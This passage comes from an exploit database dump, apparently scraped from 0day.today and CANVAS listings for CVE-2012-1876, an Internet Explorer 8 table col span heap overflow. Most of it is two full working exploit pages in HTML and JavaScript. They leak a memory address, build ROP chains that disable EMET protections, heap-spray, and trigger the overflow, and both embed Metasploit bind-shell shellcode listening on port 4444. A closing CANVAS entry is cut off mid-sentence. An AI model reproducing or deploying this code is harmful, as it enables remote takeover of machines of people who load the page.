\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n \r\n var shellcode = unescape(\"%u4444\");\r\n while (shellcode.length < 100)\r\n shellcode = shellcode + shellcode;\r\n var shellcode = shellcode.substr(0, 46);\r\n \r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01 annihilate ROP protections\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\"\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\r\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\r\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\r\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n \r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n \r\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV EAX,DWORD PTR DS:[007D25F48H]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1312272\"; // 0x07D25E40\r\n evil_col.span = \"44\";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-02-17] #", "sourceHref": "https://0day.today/exploit/22895", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T21:05:36", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "zdt", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "1337DAY-ID-22396", "href": "https://0day.today/exploit/description/22396", "sourceData": "\r\n \r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n \r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n \r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u1024%u076d\"); // EMET string\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u1024%u076d\"); // EMET string\r\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n \r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape(\"%uc8b8%u6d10\");\r\n shellcode+= unescape(\"%u8b07%u8b00\");\r\n shellcode+= unescape(\"%u6800%u10d0\");\r\n shellcode+= unescape(\"%u076d%ud0ff\");\r\n shellcode+= unescape(\"%udc68%u6d10\");\r\n shellcode+= unescape(\"%u5007%uccb8\");\r\n shellcode+= unescape(\"%u6d10%u8b07\");\r\n shellcode+= unescape(\"%u8b00%uff00\");\r\n shellcode+= unescape(\"%u8bd0%u81f0\");\r\n shellcode+= unescape(\"%uccec%u0002\");\r\n shellcode+= unescape(\"%uc700%u2404\");\r\n shellcode+= unescape(\"%u0010%u0001\");\r\n shellcode+= unescape(\"%ufc8b%uccb9\");\r\n shellcode+= unescape(\"%u0002%u8300\");\r\n shellcode+= unescape(\"%u04c7%ue983\");\r\n shellcode+= unescape(\"%u3304%uf3c0\");\r\n shellcode+= unescape(\"%u54aa%ufe6a\");\r\n shellcode+= unescape(\"%ud6ff%u9090\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\r\n shellcode+= \"NTDLL\";\r\n shellcode+= unescape(\"%u0000\");\r\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\r\n shellcode+= unescape(\"%u4374%u6e6f\");\r\n shellcode+= unescape(\"%u6574%u7478\");\r\n shellcode+= unescape(\"%u6854%u6572\");\r\n shellcode+= unescape(\"%u6461%u0000\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/22396", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:18", "description": "**Name**| ms12_037 \n---|--- \n**CVE**| CVE-2012-1876 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow \n**Notes**| CVE Name: CVE-2012-1876 \nVENDOR: Microsoft \nNotes: \nSome information regarding this exploit: \n\\- It uses an information leak so does not depend of third party software. \n\\- It works with js_recon \n\\- It only works if the template is set as the exploit itself \n \nTested on: \n* Windows XP Professional SP3 English with Internet Explorer 8 \n* Windows 7 English / Internet 